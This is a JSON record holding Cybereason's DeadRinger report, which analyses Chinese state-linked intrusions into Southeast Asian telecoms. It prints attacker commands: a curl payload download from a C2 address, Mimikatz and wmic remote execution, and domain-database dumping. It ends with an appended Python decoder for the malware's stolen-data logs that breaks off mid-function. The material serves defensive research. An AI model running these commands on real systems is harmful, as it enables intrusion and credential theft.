{
	"id": "8cff401f-d0c5-45fd-bff9-e584f644a7e8",
	"created_at": "2026-04-06T00:17:00.459806Z",
	"updated_at": "2026-04-10T03:37:21.726753Z",
	"deleted_at": null,
	"sha1_hash": "f4daa44acca79a8008c87139d620169459af59a0",
	"title": "DeadRinger: Exposing Chinese Threat Actors Targeting Major Telcos",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4042045,
	"plain_text": "DeadRinger: Exposing Chinese Threat Actors Targeting Major Telcos\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-02 11:57:48 UTC\r\nFollowing the discovery of Hafnium attacks targeting Microsoft Exchange vulnerabilities, the Cybereason Nocturnus and\r\nIncident Response teams proactively hunted for various threat actors trying to leverage similar techniques in-the-wild. In the\r\nbeginning of 2021, the Cybereason Nocturnus Team investigated clusters of intrusions detected targeting the\r\ntelecommunications industry across Southeast Asia. During the investigation, three clusters of activity were identified and\r\nshowed significant connections to known threat actors, all suspected to be operating on behalf of Chinese state interests.\r\nThe report comes on the heels of the Biden administration’s public rebuke of China’s Ministry of State Security for the\r\nrecent HAFNIUM attacks that exploited vulnerabilities in unpatched Microsoft Exchange Servers and put thousands of\r\norganizations worldwide at risk. Exploitation of these same vulnerabilities was central to the success of the attacks detailed\r\nin this research.\r\nBased on our analysis, we assess that the goal of the attackers behind these intrusions was to gain and maintain continuous\r\naccess to telecommunication providers and to facilitate cyber espionage by collecting sensitive information, compromising\r\nhigh-profile business assets such as the billing servers that contain Call Detail Record (CDR) data, as well as key network\r\ncomponents such as the Domain Controllers, Web Servers and Microsoft Exchange servers.\r\nCluster A: Assessed to be operated by Soft Cell, an activity group in operation since 2012, previously\r\nattacking Telcos in multiple regions including Southeast Asia, which was first discovered by Cybereason in\r\n2019. We assess with a high level of confidence that the Soft Cell activity group is operating in the interest of\r\nChina. 
The activity around this cluster started in 2018 and continued through Q1 2021.\r\nCluster B: Assessed to be operated by the Naikon APT threat actor, a highly active cyber espionage group in\r\noperation since 2010 which mainly targets ASEAN countries. The Naikon APT group was previously\r\nattributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical\r\nReconnaissance Bureau (Military Unit Cover Designator 78020). The activity around this cluster was first\r\nobserved in Q4 2020 and continued through Q1 2021.\r\nCluster C: A “mini-cluster” characterized by a unique OWA backdoor that was deployed across multiple\r\nMicrosoft Exchange and IIS servers. Analysis of the backdoor shows significant code similarities with a\r\npreviously documented backdoor observed being used in the operation dubbed Iron Tiger, which was\r\nattributed to a Chinese threat actor tracked by various researchers as Group-3390 (APT27 / Emissary Panda).\r\nThe activity around this cluster was observed between 2017 and Q1 2021.\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 1 of 26\n\nThe correlation between the three clusters\r\nIt is noteworthy to mention that the Cybereason Nocturnus Team also observed an interesting overlap among the three\r\nclusters: In some instances, all three clusters of activity were observed in the same target environment, around the same\r\ntimeframe, and even on the same endpoints. At this point, there is not enough information to determine with certainty the\r\nnature of this overlap -- namely, whether these clusters represent the work of three different threat actors working\r\nindependently, or whether these clusters represent the work of three different teams operating on behalf of a single threat\r\nactor. Regardless, we do offer several plausible hypotheses that might account for this observation. 
\r\nWe hope that the information provided in this report will assist in shedding light on further related intrusions, and as time\r\ngoes by more information will be made available with regard to the connection between the clusters, the suspected threat\r\nactors, and the relationship between them. \r\nDeadringer: Key Findings\r\nAdaptive, Persistent and Evasive: The highly adaptive attackers worked diligently to obscure their activity\r\nand maintain persistence on the infected systems, dynamically responding to mitigation attempts after having\r\nevaded security efforts since at least 2017, an indication that the targets are of great value to the attackers.\r\nMicrosoft Exchange Vulnerabilities Exploited: Similar to the HAFNIUM attacks, the threat actors exploited\r\nrecently disclosed vulnerabilities in Microsoft Exchange Servers to gain access to the targeted networks. They\r\nthen proceeded to compromise critical network assets such as Domain Controllers (DC) and billing systems\r\nwhich contain highly sensitive information like Call Detail Record (CDR) data, allowing them access to the\r\nsensitive communications of anyone using the affected telecoms’ services. \r\nHigh Value Espionage Targets: Based on previous findings from the Operation Soft Cell Report Cybereason\r\npublished in 2019, as well as other published analysis of operations conducted by these threat actors, it is\r\nassessed that the telecoms were compromised in order to facilitate espionage against select targets. These\r\ntargets are likely to include corporations, political figures, government officials, law enforcement agencies,\r\npolitical activists and dissident factions of interest to the Chinese government.\r\nOperating in the Interest of China: Three distinct clusters of attacks have varying degrees of connection to\r\nAPT groups Soft Cell, Naikon and Group-3390 -- all known to operate in the interest of the Chinese\r\ngovernment. 
Overlaps in attacker TTPs across the clusters are evidence of a likely connection between the\r\nthreat actors, supporting the assessment that each group was tasked with parallel objectives in monitoring the\r\ncommunications of specific high value targets under the direction of a centralized coordinating body aligned\r\nwith Chinese state interests.\r\nAcknowledgements\r\nResearch papers such as this one require collaboration and vigilance from multiple groups within the company. While the\r\nbulk of the report was produced by Cybereason Nocturnus researchers Lior Rochberger, Tom Fakterman, Daniel Frank and\r\nAssaf Dahan, this research would not have been possible without the tireless effort, analysis, attention to detail and contribution of\r\nthe Cybereason Incident Response and Security Operations teams. Special thanks and appreciation goes to Matt Hart,\r\nAkihiro Tomita, Yusuke Shimizu, Fusao Tanida, Niv Yona, Eli Salem, Ilan Sokolovsky, and Omer Yampel. \r\nWe invite you to join us for a webinar on Thursday, August 12th, at 1:00 PM ET / 10:00 AM PT where Cybereason's Head\r\nof Threat Research Assaf Dahan and VP of Security Practices Mor Levi will walk through the espionage operations\r\nuncovered in the DeadRinger report.\r\nTable of Contents\r\nExecutive Summary \r\nKey Findings \r\nCluster A: Suspected Soft Cell Activity (2018-2021+) \r\nPhase 1: Key Detected Activity\r\nPhase 2: Significant Changes in TTPs\r\nPhase 3: Significant Changes in TTPs\r\nPhase 4: Significant Changes in TTPs\r\nSimilarities to Operation Soft Cell\r\nCluster B: Suspected Naikon APT Activity \r\nMaintaining Foothold: The Nebulae Backdoor\r\nLiving Off the Land - Using Built-In Windows Tools\r\nLateral Movement: PAExec\r\nLateral Movement: WMI and Net use\r\nCredential Theft: Mimikatz\r\nCredential Theft: EnrollLoger Keylogger\r\nCluster C: OWA Backdoor Activity 
(Mini-Cluster) \r\nCustom OWA Backdoor - Core Functionality\r\nSimilarities with Iron Tiger OWA Backdoors\r\nConnections to Winnti’s Tools and Infrastructure\r\nPossible Connection Between Tropic Trooper and Soft Cell\r\nAttributing Clusters A, B and C\r\nA Note on CTI Attribution\r\nConclusion \r\nMITRE ATT\u0026CK BREAKDOWN (Cluster A - Soft Cell Activity) \r\nMITRE ATT\u0026CK BREAKDOWN (Cluster B - Suspected Naikon APT Activity) \r\nMITRE ATT\u0026CK BREAKDOWN (Cluster C - Custom OWA Backdoor) \r\nCluster A: Suspected Soft Cell Activity (2018-2021+)\r\nFollowing up on Cybereason’s discovery of the Soft Cell activity group in 2019, the Nocturnus Team continued to track the\r\ngroup’s activity and related breaches, which led us to find evidence that the group continued its operation - targeting Telcos\r\nin various regions, especially in Southeast Asian countries, all the way to mid-2021. \r\nSimilar to our 2019 report, the attackers practiced the “Low and Slow” approach, allowing them to maintain access and\r\nconduct their activity clandestinely without alerting the end users or the security teams. Based on our investigation, this\r\ncluster consisted of four main phases, with earliest signs of intrusion going back to 2018. \r\nEach phase of the operation demonstrates the attackers’ adaptiveness in how they responded to various mitigation efforts,\r\nchanging infrastructure, toolsets, and techniques while attempting to become more stealthy. Though the attackers did change\r\nsome of their tools and techniques since their exposure, their core modus operandi and tools still seem to be in line with our\r\nprevious findings. 
\r\nFrom the telemetry and forensic evidence available to us, it appears that the attackers gained initial access to the network by\r\nexploiting several vulnerabilities in Microsoft Exchange servers, including the recent set of vulnerabilities published by\r\nMicrosoft in March 2021. It is noteworthy to mention that it appears the attackers had exploited the recent Microsoft\r\nExchange vulnerabilities long before they became publicly known:\r\nTimeline of the attack - Cluster 1\r\nPhase 1: Key Detected Activity \r\nEach phase starts with the exploitation of several Microsoft Exchange server vulnerabilities which grant the attackers an\r\ninitial foothold on the targeted network, ultimately allowing them to compromise additional assets. Following the\r\nexploitation, the attackers installed the China Chopper WebShell on the compromised server and used it to perform a variety\r\nof tasks at each phase. In the first phase, the attackers mainly focused on reconnaissance activity, mapping out the network\r\nand identifying critical assets. In addition, they deployed other tools that allowed them to harvest credentials, move laterally\r\nin the network, and exfiltrate data:\r\nChina Chopper WebShell activity as seen in the Cybereason Defense Platform\r\nIt is interesting to note that initially the attackers staged many of their tools in the $RECYCLE.BIN folder, in an attempt to\r\nhide them from users and potentially avoid automatic detection by certain security tools. 
The exact same technique was also\r\ndocumented by Cybereason in our 2019 report Operation Soft Cell:\r\nReconnaissance\r\nDuring the reconnaissance phase, the attackers used various built-in Windows tools such as net, query, whoami, tasklist,\r\nhostname, and ping for internal and external connectivity checks:\r\nReconnaissance commands executed via China Chopper WebShell\r\nIn addition, the attackers used different scripts for reconnaissance. For example, one of the scripts is called “test.bat” and\r\nwas used to execute PortQry, a command-line utility for troubleshooting TCP/IP connectivity issues that reports the\r\nstatus of TCP and UDP ports on a remote machine, which can also be used for Active Directory reconnaissance. The binary\r\nitself was renamed to “psc.exe” by the attacker, probably in an attempt to avoid detection.\r\nThe second script found was psloglist.bat, which runs Microsoft’s Sysinternals PsLogList tool and saves the security logs\r\nfrom the event viewer from the last 10 days:\r\nThe content of psloglist.bat\r\nCredential theft\r\nThroughout the operation, the attackers used various tools and techniques to harvest credentials. The most common tool they\r\nused is the notorious Mimikatz. In the first phase, the attackers used the well-known PowerShell Empire Invoke-Mimikatz\r\nscript, which was stored in the same directory as the WebShell itself:\r\nMalware alert for nm.sp1 - PowerShell Empire Invoke-Mimikatz script\r\nThe credentials were sent back to the attackers and were used for lateral movement and privilege escalation.\r\nLateral Movement\r\nThe attackers used different methods and tools to move laterally to different endpoints on the network, such as Cobalt Strike\r\nimplants, WMI and Net Use. 
\r\nWMI and Net Use\r\nThe attackers used the command “net use” to configure connections to shared resources on the network, and to copy their\r\ntools to different systems. After the tools were copied, the attackers were able to execute them remotely using WMI and by\r\ncreating scheduled tasks remotely to run them:\r\nNet Use commands as seen in the Cybereason Defense Platform\r\nCreation of remote scheduled tasks\r\nExecuting scripts remotely using WMI\r\nData Exfiltration\r\nIn an attempt to hide the contents of the stolen data, the threat actors compressed and password-protected the data using the\r\nWinRAR tool. The RAR files were then placed in the C:\\users\\SUPPORT_388945a0\\Documents folder. This folder belongs\r\nto a built-in user account (SUPPORT_388945a0) that is used by the Help and Support service, which is disabled by default but\r\nwas purposefully enabled by the attacker. The data was then exfiltrated using the China Chopper WebShell. \r\nIt is also interesting to mention that the nefarious use of this specific account (SUPPORT_388945a0) was previously seen\r\nwith the Chinese APT3 and the Iranian Leafminer threat actors:\r\nEvidence of archived collected data using China Chopper\r\nKnowing what data the attackers tried to exfiltrate can sometimes shed light on the attackers’ motivations. In our previous\r\nreport about Soft Cell, we were able to determine that the attackers exfiltrated CDR data from telecommunication providers\r\nin order to facilitate cyber espionage against specific individuals. \r\nMaintaining Foothold: PcShare Backdoor\r\nAside from the China Chopper WebShell, the attackers relied heavily on a known backdoor named PcShare, whose code is\r\npublicly available and has been reported as mostly used by Chinese threat actors attacking Southeast Asian countries. 
PcShare\r\nhas the following capabilities:\r\nControlling the file system\r\nManipulation of system services\r\nUploading and downloading files \r\nProcess manipulation\r\nManipulating the Windows Registry\r\nExecuting arbitrary commands using Windows CMD Shell\r\nRebooting/shutting down the system\r\nDisplaying message boxes to the user\r\nPcShare was executed via a Loader DLL (NvSmartMax.dll) and a Payload (NvSmartMax.dat) attempting to masquerade as\r\na legitimate module by NVIDIA named “NvSmartMax.dll”: “NVIDIA Smart Maximise Helper Host” application (part of\r\nNVIDIA GPU graphics driver).\r\nIn most cases, the attackers used the legitimate nvSmartEx.exe to side-load the loader DLL (“NvSmartMax.dll”). The loader\r\nthen decrypts the PcShare core payload (“NvSmartMax.dat”) placed in the same directory. It is interesting to note that the payload\r\n.dat file that was used during this attack has the exact same hash mentioned in a report by BlackBerry from 2019, detailing\r\nthe same execution technique used to stealthily load PcShare into memory. 
\r\nCybereason observed that in addition to what was reported by BlackBerry, the NvSmartMax.dll was also executed directly\r\nvia rundll32.exe in certain instances:\r\nPcShare execution graph\r\nThe execution of the backdoor on the remote machine revealed additional activities performed by the attackers, including:\r\nReconnaissance activity to collect information about the endpoint and network\r\nSearching for security tools and attempting to disable or kill their processes\r\nCreating two scheduled tasks for the Cobalt Strike loader: Microsoft\\Windows\\Wininet\\Config and\r\nMicrosoft\\Windows\\WindowsColorSystem\\Config\r\nUsing PowerShell to alter the creation time of the Cobalt Strike loader and payload files, a technique called\r\ntimestomping, which is used for detection evasion\r\nExecuting the Cobalt Strike loader\r\nThe execution of the PcShare backdoor as seen in the Cybereason Defense Platform\r\nPcShare Continuously in Use Since 2018\r\nOur investigation revealed that the attackers were operating in the target network for at least two and a half years before\r\nCybereason was deployed in the environment. One piece of evidence that the attackers were present in the network from\r\n2018 is the creation time of the PcShare binary:\r\nCreation time of the PcShare backdoor as seen in the Cybereason Defense Platform\r\nAnother piece of evidence that supports the assessment that the attackers were inside the network since 2018 is that the same\r\nIP address that was hard-coded inside the PcShare backdoor mentioned above was also used in a scheduled task. 
The\r\nscheduled task used the curl.exe binary in order to download a payload (a CAB file that contains the file “nvSmartEx.exe”)\r\nfrom the mentioned C2 and save it in the recycle.bin folder:\r\nScheduled task - [cmd.exe /c c:\\$recycle.bin\\curl.exe http://45.123.118[.]232/1.txt \u003ec:\\$recycle.bin\\1.txt]\r\nThe same IP address, embedded inside the PcShare binary\r\nIn addition to the scheduled task above, the attackers created another scheduled task with the same name (VV1) on other\r\nmachines in the network. This task was different from the one above, and it was used to execute a bat script located under\r\nc:\\$recycle.bin\\q.bat, also created by the attackers.\r\nInstalling a VPN\r\nIn order to maintain persistence in the network and create an easy access point to the network, the attackers installed SoftEther\r\nVPN, which they renamed to “oracll.exe” in order to evade detection. SoftEther helps disguise the traffic as benign on the\r\ntarget network. The same VPN client was previously observed in attacks involving the Soft Cell activity group:\r\nRenamed SoftEther VPN binary\r\nPhase 2: Changes in TTPs\r\nIn addition to the activities performed in the first phase, such as reconnaissance activity or the use of PcShare and WMI - the\r\nattackers also used tools that were not used by them in the previous phase.\r\nThe attackers used a tool called Local Group, which is useful for adding and enumerating users in a domain, and a different\r\nMimikatz, this time using a DLL search order hijacking technique.\r\nThe attackers used the Local Group binary lg.exe with the “-lu” option that, according to the usage guide, enumerates all\r\nlocal groups and members on a domain. 
This was executed remotely on the DC server, and the output was saved into “1.txt”:\r\nExecuting lg.exe - local group, and saving the output to 1.txt\r\nAs mentioned, the attackers used the DLL search order hijacking technique in order to load Mimikatz. To do so, the\r\nattackers replaced the legitimate DLL “mscorsvc.dll” and then executed the binary “mscorsvw.exe” which loads this DLL:\r\nPreparing the files for DLL search order hijacking of the malicious mscorsvc.dll\r\nFrom the activities observed, the DLL executed Mimikatz, performed Pass-the-Hash and credential dumping, and performed\r\nsome reconnaissance commands using “net user”:\r\nExecution of the mscorsvw.exe process with the malicious search order hijacked DLL, mscorsvc.dll\r\nPhase 3: Changes in TTPs\r\nThe third phase shares similarities with the initial phases, yet has its own unique characteristics, namely, with the\r\nintroduction of new tools that were not observed in the previous phases.\r\nThose tools include a script used for AD database dumping, NBTScan, the Dump Event Log tool, and again, a new Mimikatz\r\nexecutable. 
The attackers ran a script named a.bat remotely on several DCs, which is used to dump the Active Directory\r\nDatabase file (ntds.dit) using NTDSUTIL’s IFM Creation (VSS shadow copy):\r\nThe creation, execution and deletion of a.bat\r\nThe execution of a.bat as seen in the Cybereason Defense Platform\r\nThe attackers extended their reconnaissance activity in phase three by executing NBTScan (named smnbt.exe), which is\r\nused for scanning IP networks for NetBIOS naming information, in addition to other native tools such as query.exe and\r\ndsget.exe:\r\nExecution of the WebShell as seen in the Cybereason Defense Platform\r\nAs observed in the other phases, the attackers harvested credentials using Mimikatz, but this time it was an executable (.exe)\r\nfile named s6.exe and 26.exe (both have the same hash). The process was executed both by the WebShell and by using\r\nWMI. The output was saved into files named “1.txt” and “log.log”, and later sent to the attackers:\r\nSaving the output of Mimikatz to 1.txt and log.log\r\nPhase 4: Changes in TTPs\r\nThe only addition observed in phase four compared to the previous phases is that the attackers once again used a different\r\nMimikatz executable named d64.exe. It was found in both folders: c:\\windows\\d64.exe and c:\\compaq\\d64.exe:\r\nPrevention of d64.exe - Mimikatz\r\nSimilarities to Operation Soft Cell\r\nDuring the investigation, we observed significant similarities to the activity described in Operation Soft Cell. 
Here are some of\r\nthe similarities between the investigations:\r\nCategory: Naming convention\r\nCluster A: Suspected Soft Cell Activity:\r\nTools saved under C:\\PerfLogs\\\r\nC:\\perflogs\\s6.exe (Mimikatz)\r\nc:\\perflogs\\msnbt.exe (NBTScan)\r\nc:\\perflogs\\lg.exe (Local Group)\r\nMimikatz execution:\r\n\"cmd\" /c cd /d C:\\PerfLogs\\\u0026s6.exe \u003e1.txt\u0026echo [S]\u0026cd\u0026echo [E]\r\nRunning a script named “a.bat” remotely, using WMI:\r\nwmic /node:[REDACTED] process call create a.bat\u0026echo [S]\u0026cd\u0026echo [E]\r\nOperation Soft Cell:\r\nTools saved under C:\\PerfLogs\\\r\nC:\\perflogs\\pl6.exe (Mimikatz)\r\nC:\\perflogs\\nbt.exe (NBTScan)\r\nc:\\perflogs\\lg.exe (Local Group)\r\nMimikatz execution:\r\n\"cmd\" /c cd /d C:\\PerfLogs\\\u0026pl6.exe \u003e 1.txt\u0026echo [S]\u0026cd\u0026echo [E]\r\nRunning a script named “a.bat” remotely, using WMI:\r\nwmic /node:[REDACTED] /user:\"[REDACTED]\" /password:\"[REDACTED]\" process call create a.bat\u0026echo [S]\u0026cd\u0026echo [E]\r\nCategory: Shared tools used\r\nLocal Group (renamed “lg.exe” in both cases)\r\nPortQry (renamed “psc.exe” in both cases)\r\nSoftEther VPN (renamed in both cases)\r\nNBTScan (renamed in both cases)\r\nChina Chopper WebShell\r\nCobalt Strike Payloads\r\nNET commands\r\nModified Mimikatz\r\nWMI\r\nCategory: Techniques / procedures\r\nExploiting the Exchange server every few months\r\nChange IOCs between phases\r\nHiding tools in the recycle.bin folder\r\nUse of the DLL search order hijacking technique\r\nRenaming binaries\r\nIn addition to the similarities observed among TTPs, there was another connection to the original Soft Cell report. In\r\nfollowing the infrastructure of the Soft Cell activity group and analyzing their tools, one tool got our attention: d64.exe, the\r\nMimikatz binary observed in phase 4. 
This file’s PDB pattern is very similar to other tools observed in the Operation Soft\r\nCell report and related samples:\r\nPDB path observed in d64.exe / PDB found in previous Soft Cell binaries\r\nE:\\vs_proj\\mimkTools\\dcsync_new\\x64\\dcsync64.pdb\r\nE:\\simplify_modify\\x64\\simplify.pdb\r\nE:\\vs_proj\\simplify_modify\\Win32\\simplify.pdb\r\nPivoting from the files observed in the attack, other malicious files with the same PDB patterns (“E:\\vs_proj\\*” and\r\n\"E:\\simplify_modify\\*\") were found which could be part of the Soft Cell activity group arsenal. Please refer to Appendix A\r\nfor further details.\r\nCluster B: Suspected Naikon APT Activity\r\nDuring our investigation, as more evidence was collected, Cybereason identified another cluster of activity targeting Telcos\r\nin ASEAN countries. This cluster exhibits rather unique TTPs compared to the ones detailed in Cluster A; namely the use of\r\ndifferent tools and C2 server infrastructure. In addition, this cluster’s activity was first observed in Q4 of 2020, while Cluster\r\nA goes back to 2018. \r\nThe main tool used in this cluster is the newly discovered Nebulae backdoor, which according to BitDefender is attributed to\r\nthe Naikon APT group. In addition, the attackers deployed a previously undocumented keylogger dubbed “EnrollLoger” on\r\nselected high-profile assets, most likely to obtain sensitive information and to harvest credentials of high-privilege user\r\naccounts. \r\nAs previously mentioned, while Cluster B has its unique characteristics that separate it from Cluster A, there were some\r\noverlaps observed in terms of the victimology, time frame, the endpoints and some generic tools that were also observed in\r\nCluster A. \r\nMaintaining Foothold: The Nebulae Backdoor\r\nOne of the unique tools spotted in the course of the attack is the rare Nebulae backdoor, which was first reported in April\r\n2021 and attributed to the Naikon group. 
The attackers evidently tried to evade detection by executing the backdoor in the\r\ncontext of legitimate and trusted applications that are vulnerable to DLL Side-Loading. \r\nFor example, the attackers used the legitimate “chrome_frame_helper.exe” - which is part of Google's “Google Chrome\r\nFrame” - to load the fake module “chrome_frame_helper.dll”, which contained the Nebulae backdoor payload:\r\nNebulae Backdoor execution as seen in the Cybereason Defense Platform\r\nOnce Cybereason blocked and quarantined “chrome_frame_helper.dll”, the attackers immediately adapted by deploying the\r\nNebulae backdoor via a new legitimate application that is vulnerable to DLL Side-Loading. This time the attackers used\r\n“patchwrap.exe”, which is a “Symantec Client Management Component” that loads the malicious module “atl110.dll”. \r\nAs displayed below in the Cybereason Defense Platform, the exploitation of trusted security tools and especially anti-virus\r\nsoftware is a well-known tactic used by many threat actors: \r\nNebulae Backdoor execution of various tasks as seen in the Cybereason Defense Platform\r\nThe main features of the Nebulae backdoor include:\r\nReconnaissance and information gathering about infected hosts\r\nFile and process manipulation\r\nExecution of arbitrary commands\r\nPrivilege escalation\r\nC2 communications using raw sockets\r\nRC4 data encryption for communication between the C2 and the target\r\nAlthough the Nebulae backdoor was first reported in April 2021, our analysis of the backdoor’s code, together with a file\r\nuploaded to VT in January 2016, indicates that first versions of the Nebulae backdoor were\r\nalready being used since 2016:\r\nHistoric submission data of an early 
Nebulae sample\r\nThe backdoor communicates with the C2 in what seems to be a somewhat custom implementation of an RC4 encryption\r\nalgorithm. Initially, it uses an XOR key to decrypt the C2:\r\nDecryption of the C2\r\nFollowing this procedure, the malware collects data about the infected machine such as the user and machine names,\r\noperating system version etc., then encrypts it and sends it to the C2. It then awaits further instructions and jumps to the\r\ncorresponding method:\r\nJump table for code execution according to the appropriate value\r\nReconnaissance\r\nLiving Off the Land - Using Built-In Windows Tools\r\nIn order to collect information about the network and endpoints, the attackers used different built-in Windows tools such as\r\nnet commands, quser, reg, systeminfo, tasklist, netstat, and ping for internal and external connectivity checks. In addition,\r\nthe attackers used system commands in order to perform a Ping scan, using the command “find /i\"ttl” to check for successful\r\nconnections:\r\nExecution of legitimate tools for reconnaissance and lateral movement as seen in the Cybereason Defense Platform\r\nLateral Movement\r\nPAExec\r\nThe attackers used a renamed PAExec for lateral movement. PAExec is similar to Sysinternals’ PsExec, and it is a\r\nredistributable version of PsExec with some additional options. PAExec was used to connect to remote servers and execute\r\nadditional tools. Both PAExec and PsExec are very common legitimate tools that are seen over and over in the context of\r\ncyberattacks and used by many threat actors:\r\nbackup.exe \\\\\u003cIP Address\u003e cmd.exe\r\nWMI and Net use\r\nThe attackers used the command “net use” in order to access shared network resources on remote machines. 
Additionally,\r\nWMI was used to execute tools such as the Nebulae Backdoor remotely:\r\nwmic /node:\u003cIP Address\u003e /user:\u003cUser\u003e /password:\u003cPassword\u003e process call create \"C:\\Program Files\r\n(x86)\\Symantec\\Symantec Endpoint Protection\\PatchWrap.exe\"\r\nCredential theft\r\nThe attackers used Sysinternals’ ProcDump and Mimikatz to dump credentials from the domain controllers. \r\nProcDump\r\nProcDump is a tool by Windows Sysinternals that is able to create dumps of processes in the system. The original purpose of\r\nProcDump is to create dumps for troubleshooting issues; however, attackers may use the tool in order to dump critical\r\nprocesses like lsass.exe for the purpose of extracting password hashes from its memory:\r\nPAExec and ProcDump execution as seen in the Cybereason Defense Platform\r\nMimikatz\r\nThe attackers used a Mimikatz executable that masquerades as Internet Explorer. The metadata of the Mimikatz executable, along with\r\nthe icon, were altered to appear as an Internet Explorer binary in an effort to be stealthy. Additionally, another Mimikatz\r\nexecutable similarly masquerades as Google Chrome, and was found among the tools of Cluster B:\r\nPAExec and Mimikatz execution as seen in the Cybereason Defense Platform\r\nEnrollLoger Keylogger\r\nOne of the tools used by the attackers was a custom-built keylogger dubbed “EnrollLogger” by Cybereason. 
In order to hide the malicious activity, the attackers deployed a legitimate South Korean multimedia player called “PotPlayer” that has a known DLL-hijacking vulnerability, along with a trojanized DLL file called PotPlayer.dll.txt that is loaded by PotPlayer.exe upon execution, making the activity appear legitimate:\r\nKeylogger execution as seen in the Cybereason Defense Platform\r\nAt the time of the attack, the malicious DLL had a very low detection rate:\r\nDetection rate of the keylogger in VirusTotal\r\nThe fake DLL has several empty exports; the export that contains the malicious code is called PreprocessCmdLineExW. The keylogger uses the GetKeyState() function to monitor the user’s keystrokes, saving them to an allocated buffer in memory. In addition, the keylogger also steals data stored on the Windows clipboard. The collected keystrokes and clipboard data, along with other information, are then XOR-encrypted (each byte with 0xaf if it equals zero, or with 0xaa otherwise) and saved in text files located in a directory created by the keylogger:\r\nC:\\Users\\user\\AppData\\Roaming\\Microsoft\\Network\\cache\r\nData saved by the keylogger\r\nAn example of a decrypted file looks like this:\r\nDecrypted data file that was collected by the Keylogger\r\nCluster C: OWA Backdoor Activity (Mini-Cluster)\r\nDuring the investigation, we revealed a third cluster, which is in fact a mini-cluster characterized mainly by the deployment of multiple instances of a custom OWA (Outlook Web Access) backdoor. The backdoor was used to harvest the credentials of users logging into Microsoft OWA services, granting the attackers the ability to access the environment stealthily. According to the forensic evidence available to us, the earliest indications of use of this backdoor begin in 2017. 
The deployment of the backdoor continued all the way to 2021, bearing the hallmark of a true advanced persistent threat (APT). From 2017 to 2020 we observed only a few instances of the backdoor. However, in March 2021, the attackers installed the backdoor on over 20 machines in a short period of time. This uptick could be explained by the attackers having lost access due to mitigation efforts and needing to re-establish it. Another possible explanation is Microsoft’s release of patches for the newly discovered Microsoft Exchange Server vulnerabilities, which caused a sharp rise in attacks against Microsoft Exchange servers that were still unpatched.\r\nCode analysis of this backdoor showed considerable similarities with previously documented backdoors dubbed “Dllshellexc2007” and “Dllshellexc2010”, which were discovered by Trend Micro in their Operation Iron Tiger report and attributed to Group-3390 (also tracked by some vendors as APT27 or Emissary Panda). According to the Iron Tiger report, the backdoor is compatible with, and can integrate with, the China Chopper WebShell.\r\nThe activity of this backdoor, however, could not be tied directly to the other clusters, which is why we decided to keep it as a separate cluster. That being said, there were some instances where we observed this backdoor deployed on the same victim as Clusters A and B, around the same time frames, and in some cases even on the same endpoints.\r\nGiven these overlaps and the previously documented compatibility of this OWA backdoor with the China Chopper WebShell, it is possible that Cluster C is somehow related to the activity described in Cluster A, yet a direct connection between the two was not observed in our investigation. 
\r\nCustom OWA Backdoor - Core Functionality\r\nThe custom .NET backdoor is deployed under the name “Microsoft.Exchange.Clients.Event.dll” and can be installed on either Microsoft Exchange or Internet Information Services (IIS) servers. The main purpose of this backdoor is to harvest the credentials of any user that authenticates to OWA services. In addition, the backdoor also contains WebShell-like functionality, allowing the attackers to run arbitrary commands, exfiltrate data and deploy additional tools.\r\nThe .NET binary itself is obfuscated with .NET Reactor, a commercial code protection and software licensing system. This kind of obfuscation software is often used by malware authors in an effort to hinder analysis. The backdoor intercepts requests whose URI contains “owa/auth.owa” (the default OWA login URI) and steals the login credentials:\r\nThe backdoor checks the URI of the HTTP request\r\nThe backdoor logs the following information from the HTTP requests:\r\nConnection date and time\r\nRemote IP address\r\nUsername and password used to log in\r\nUser agent\r\nIn order to protect the stolen data, the backdoor XORs each byte of the collected information with the value 183 (0xB7) and saves the result, base64-encoded, to a file named “~ex.dat” in the %temp% directory. 
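Both stolen-data formats in this report are simple XOR schemes: the EnrollLogger cache files described in Cluster B (0xaf for zero bytes, 0xaa for every other byte) and the OWA backdoor's ~ex.dat described just above (every byte XORed with 183, then base64). The decoders below are an added example, not code from the report or from Cybereason. The report does not say how ~ex.dat is laid out, so the example assumes one base64 blob per line, each holding one or more newline-terminated records in the field order shown in the decoded log samples later in this section; text is assumed to be UTF-8, and the sample records are constructed.

```python
# Added example, not from the DeadRinger report: decoders for the two
# stolen-data formats the report describes. Layout details the report does not
# state (one base64 blob per line in ~ex.dat, UTF-8 text) are assumptions, and
# the sample records are constructed.
import base64

OWA_XOR_KEY = 183        # ~ex.dat: every byte XORed with 183 (0xB7), then base64
KL_XOR_ZERO = 0xAF       # EnrollLogger: zero bytes are XORed with 0xAF ...
KL_XOR_OTHER = 0xAA      # ... every other byte with 0xAA


def encode_enrolllogger(data: bytes) -> bytes:
    """Re-implements the keylogger's scheme so sample cache files can be built offline."""
    return bytes(b ^ (KL_XOR_ZERO if b == 0 else KL_XOR_OTHER) for b in data)


def decode_enrolllogger(blob: bytes) -> bytes:
    # The scheme is not a bijection: 0x00 ^ 0xAF == 0x05 ^ 0xAA == 0xAF, so a
    # stored 0xAF is ambiguous. Map it back to 0x00 (NUL padding is far more
    # likely than ENQ in keystroke/clipboard text); everything else inverts with 0xAA.
    return bytes(0 if b == KL_XOR_ZERO else b ^ KL_XOR_OTHER for b in blob)


def decode_owa_blob(b64line: str) -> bytes:
    raw = base64.b64decode(b64line.strip())
    return bytes(b ^ OWA_XOR_KEY for b in raw)


def parse_owa_log(ex_dat_text: str) -> list:
    """Decode ~ex.dat and split each record into the fields the backdoor logs."""
    records = []
    for b64line in ex_dat_text.splitlines():
        if not b64line.strip():
            continue
        plain = decode_owa_blob(b64line).decode('utf-8', errors='replace')
        for rec in plain.splitlines():
            # "<date> <time> <AM|PM> <remote ip> <username> <password> <user agent>"
            # A password containing spaces would shift the user-agent boundary.
            parts = rec.split(' ', 6)
            if len(parts) < 6:
                continue
            records.append({
                'timestamp': ' '.join(parts[:3]),
                'remote_ip': parts[3],
                'username': parts[4],
                'password': parts[5],
                'user_agent': parts[6] if len(parts) == 7 else '',
            })
    return records


def build_ex_dat(records) -> str:
    """Constructs a ~ex.dat file the way the backdoor is assumed to write it."""
    lines = []
    for rec in records:
        obfuscated = bytes(b ^ OWA_XOR_KEY for b in (rec + '\r\n').encode('utf-8'))
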